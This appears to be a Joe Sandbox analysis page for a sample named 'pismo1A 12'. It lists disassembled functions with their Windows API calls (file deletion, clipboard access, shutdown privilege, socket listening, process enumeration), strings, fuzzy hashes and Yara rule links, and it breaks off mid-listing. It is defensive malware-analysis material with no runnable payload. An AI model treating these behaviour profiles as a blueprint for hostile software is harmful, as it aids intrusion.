API String ID: 2640511053-438819550
Opcode ID: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
Instruction ID: fdd8dd5c6f38a39edd9026843a6a02e5afa8968be3dc809157535169d2addeb8
Opcode Fuzzy Hash: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
Instruction Fuzzy Hash: 2431C572500219AEEF11AFB8DC58ADE77ACEF06321F108155E915A30D0DB38DEC6CB24

Function 00718195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00718257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00718267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00718273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00718310
SetCurrentDirectoryW.KERNEL32(?), ref: 00718324
SetCurrentDirectoryW.KERNEL32(?), ref: 00718356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0071838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00718395

Strings

*.*, xrefs: 0071839B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
Instruction ID: ee5a00459475c0016f33f05d97cb47686beae59588e32ce1db2c221b064d05e6
Opcode Fuzzy Hash: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
Instruction Fuzzy Hash: 166199B25043059FCB50EF24C8409AEB3E9FF89310F04891EF99983291EB39E945CF96

Function 0070D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

FindFirstFileW.KERNEL32(?,?), ref: 0070D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0070D1DD
MoveFileW.KERNEL32(?,?), ref: 0070D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D237

Part of subcall function 0070D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0070D21C,?,?), ref: 0070D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0070D253
FindClose.KERNEL32(00000000), ref: 0070D264

Strings

\*.*, xrefs: 0070D0CD, 0070D0D6, 0070D0EB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: a75f04ba4b367b7feaf36006531df04c4e23cd208c03b9fba7104e6604bfdc11
Instruction ID: 5b485ea974199b4da6998b3135cce1f03d8f384a23903385a0476121bb0d31b6
Opcode Fuzzy Hash: a75f04ba4b367b7feaf36006531df04c4e23cd208c03b9fba7104e6604bfdc11
Instruction Fuzzy Hash: A0615E3180121DDACF15FBE0D9529EDB7B6AF55300F248269E40277191EB386F09CF65

Function 0071ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0071ED91
EmptyClipboard.USER32 ref: 0071ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0071EDAC
CloseClipboard.USER32 ref: 0071EEA3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
Instruction ID: 66263e73eae3fca92356e683730931daf0f21c77e5e702b0db48aa06776f526b
Opcode Fuzzy Hash: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
Instruction Fuzzy Hash: A4419F352046119FE311DF19E849B59BBE1FF44329F14C09DE8599B6A2C739EC81CB94

Function 0070E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A

ExitWindowsEx.USER32(?,00000000), ref: 0070E932

Strings

@, xrefs: 0070E925
, xrefs: 0070E920
SeShutdownPrivilege, xrefs: 0070E902
, xrefs: 0070E95C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
Instruction ID: 6a7c54a4c9d6d6800e2f802ed8370c50a29c59c69266756b6b6c0230dca4711c
Opcode Fuzzy Hash: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
Instruction Fuzzy Hash: 0A01D673620311EBFB5466B49C8ABBB72DCA714751F154F21FC03F21D1D5AD6C408295

Function 00721204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00721276
WSAGetLastError.WSOCK32 ref: 00721283
bind.WSOCK32(00000000,?,00000010), ref: 007212BA
WSAGetLastError.WSOCK32 ref: 007212C5
closesocket.WSOCK32(00000000), ref: 007212F4
listen.WSOCK32(00000000,00000005), ref: 00721303
WSAGetLastError.WSOCK32 ref: 0072130D
closesocket.WSOCK32(00000000), ref: 0072133C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
Instruction ID: 4ccba42980433399728e2d7054b0581ea747717162306dd9ccbe47a85726deb0
Opcode Fuzzy Hash: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
Instruction Fuzzy Hash: 8B419231A00110DFD710DF24D498B6ABBE6BF56318F588198E8569F293C779ED81CBE1

Function 006DB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006DB9D4
_free.LIBCMT ref: 006DB9F8
_free.LIBCMT ref: 006DBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
_free.LIBCMT ref: 006DBD4B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
Instruction ID: 28bf3f34090576106390a5f83318100de19ccc6858a37cf329b0aa4061576a88
Opcode Fuzzy Hash: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
Instruction Fuzzy Hash: 1AC15571E00245EFCB209F688C51BEA7BAAEF45350F1A519FE484DB35AEB308E418758

Function 0070D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

FindFirstFileW.KERNEL32(?,?), ref: 0070D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D481
FindClose.KERNEL32(00000000), ref: 0070D498
FindClose.KERNEL32(00000000), ref: 0070D4A1

Strings

\*.*, xrefs: 0070D3F2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 2eb7e91ff8087c70df9d855c8ce32e534db5071d0cb5fea6ca26277a461487e8
Instruction ID: 793ff6efe064ec72033b4acb804380952c8e909574a60aa9fdebf398e7e03d2b
Opcode Fuzzy Hash: 2eb7e91ff8087c70df9d855c8ce32e534db5071d0cb5fea6ca26277a461487e8
Instruction Fuzzy Hash: 7B316F710083959BC255FFA4D8518AFB7E9BE92300F448A1DF8D193191EB28AE09CB67

Function 006DE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006DE645

Strings

1#IND, xrefs: 006DF83D
1#SNAN, xrefs: 006DF844
1#INF, xrefs: 006DF852
1#QNAN, xrefs: 006DF84B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
Instruction ID: bba3fbb32d3d55527ad7070aaff4de3d56373651a416590b01eacc1d0657ed63
Opcode Fuzzy Hash: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
Instruction Fuzzy Hash: 07C23871E086288BDB65DF289D407EAB7B6EB48304F1441EBD84EE7341E775AE818F40

Function 0071648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007164DC
CoInitialize.OLE32(00000000), ref: 00716639
CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 00716650
CoUninitialize.OLE32 ref: 007168D4

Strings

.lnk, xrefs: 007164BA, 00716524, 007165E0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 8f4fc5d36f5496d06ef2c75b309d1b436f11c2fbe1f6d5508a990a896a86b689
Instruction ID: 491dfb617ad6986f4d0a749aa88b1876513d99e144bcf417b9f86581de10c24d
Opcode Fuzzy Hash: 8f4fc5d36f5496d06ef2c75b309d1b436f11c2fbe1f6d5508a990a896a86b689
Instruction Fuzzy Hash: 7DD14971508301AFD344EF24C8819ABB7EAFF95704F10496DF5958B2A2EB70ED45CBA2

Function 007222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 007222E8

Part of subcall function 0071E4EC: GetWindowRect.USER32(?,?), ref: 0071E504

GetDesktopWindow.USER32 ref: 00722312
GetWindowRect.USER32(00000000), ref: 00722319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00722355
GetCursorPos.USER32(?), ref: 00722381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007223DF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
Instruction ID: fd7a2b360e980787fb60acf02511e7fda63e51ec92b25a1d93f8916eb7834769
Opcode Fuzzy Hash: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
Instruction Fuzzy Hash: C031E272504315AFD721DF14D849B5BB7E9FF84310F004A1DF985A7192DB38E909CB96

Function 00719B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00719B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00719C8B

Part of subcall function 00713874: GetInputState.USER32 ref: 007138CB
Part of subcall function 00713874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00719BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00719C75

Strings

*.*, xrefs: 00719B5D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: cee2877748290881f8081a8262553c858de47765ae84a181ddb4f2ee944842b7
Instruction ID: 4a0d27f22a23c9ab24aa3c9d21ca0038bd667658e33744d4e2c0b40b01f7bb54
Opcode Fuzzy Hash: cee2877748290881f8081a8262553c858de47765ae84a181ddb4f2ee944842b7
Instruction Fuzzy Hash: 6C41A2719042199FDF55EF68C855AEEBBB9EF05300F204059E905A32D1DB389E85CFA4

Function 006B997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 006B9A4E
GetSysColor.USER32(0000000F), ref: 006B9B23
SetBkColor.GDI32(?,00000000), ref: 006B9B36

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
Instruction ID: 9e4622eddce1af2bc9741760b605c09c36d9c21aee008c8134c24f71fd9a7ba8
Opcode Fuzzy Hash: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
Instruction Fuzzy Hash: 9AA117F0118448EEE729AA3C8C99EFB369FDF42340F154119F702D6792CA299D82D776

Function 00721806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0072307A
Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0072185D
WSAGetLastError.WSOCK32 ref: 00721884
bind.WSOCK32(00000000,?,00000010), ref: 007218DB
WSAGetLastError.WSOCK32 ref: 007218E6
closesocket.WSOCK32(00000000), ref: 00721915

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
Instruction ID: 9fa1c8e9333f4dc4842860c6037e8627a55bc8e01ef0a4525272747a73bfc9e1
Opcode Fuzzy Hash: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
Instruction Fuzzy Hash: 8051C371A00210AFEB10AF24D886F6A77E6AF45718F48805CF949AF3C3C775ED418BA5

Function 00731C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00731CC0
IsWindowEnabled.USER32 ref: 00731CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00731CDB
IsIconic.USER32 ref: 00731CE9
IsZoomed.USER32 ref: 00731CF7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4c88e5d17c7498f8c85a1081f4574f67947005df453fbf57c47ff0b7f789eb4b
Instruction ID: f7b590ca75b614fcf5fae3e3290a2e427781e038c450805924649d9414c17f2a
Opcode Fuzzy Hash: 4c88e5d17c7498f8c85a1081f4574f67947005df453fbf57c47ff0b7f789eb4b
Instruction Fuzzy Hash: 8321D3317402109FF7218F2AC854B6A7BA5EF85325F59D068E8469B353CB79DC42CBA4

Function 006A8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 006A813C
VUUU, xrefs: 006A83E8
VUUU, xrefs: 006E5DF0
VUUU, xrefs: 006A843C
VUUU, xrefs: 006A83FA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
Instruction ID: 06b8b75304216b54d4e2a70e59847dd219a725b5e747d5b63e94db691bc4545a
Opcode Fuzzy Hash: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
Instruction Fuzzy Hash: 0BA26A70E0125ACFDF24DF59C8507EDB7B2BB55314F2481AAE816A7385EB709E818F90

Function 00708298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007082AA

Strings

|, xrefs: 007082DA
tbv, xrefs: 007084F4
(, xrefs: 007082F0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: lstrlen
String ID: ($tbv$|
API String ID: 1659193697-2555993713
Opcode ID: 75b3fd3d620053617cd4bf45886fbd8b99f63056e73984390b8e99748aede476
Instruction ID: caa3681f2b34da061c2418641e246ada119f36e72eee85b3ca5486000c0b7b37
Opcode Fuzzy Hash: 75b3fd3d620053617cd4bf45886fbd8b99f63056e73984390b8e99748aede476
Instruction Fuzzy Hash: 0C323474A00605DFCB68CF59C481A6AB7F0FF48710B15866EE49ADB3A1EB74E981CB44

Function 0072A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0072A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0072A6BA

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0072A79C
CloseHandle.KERNEL32(00000000), ref: 0072A7AB

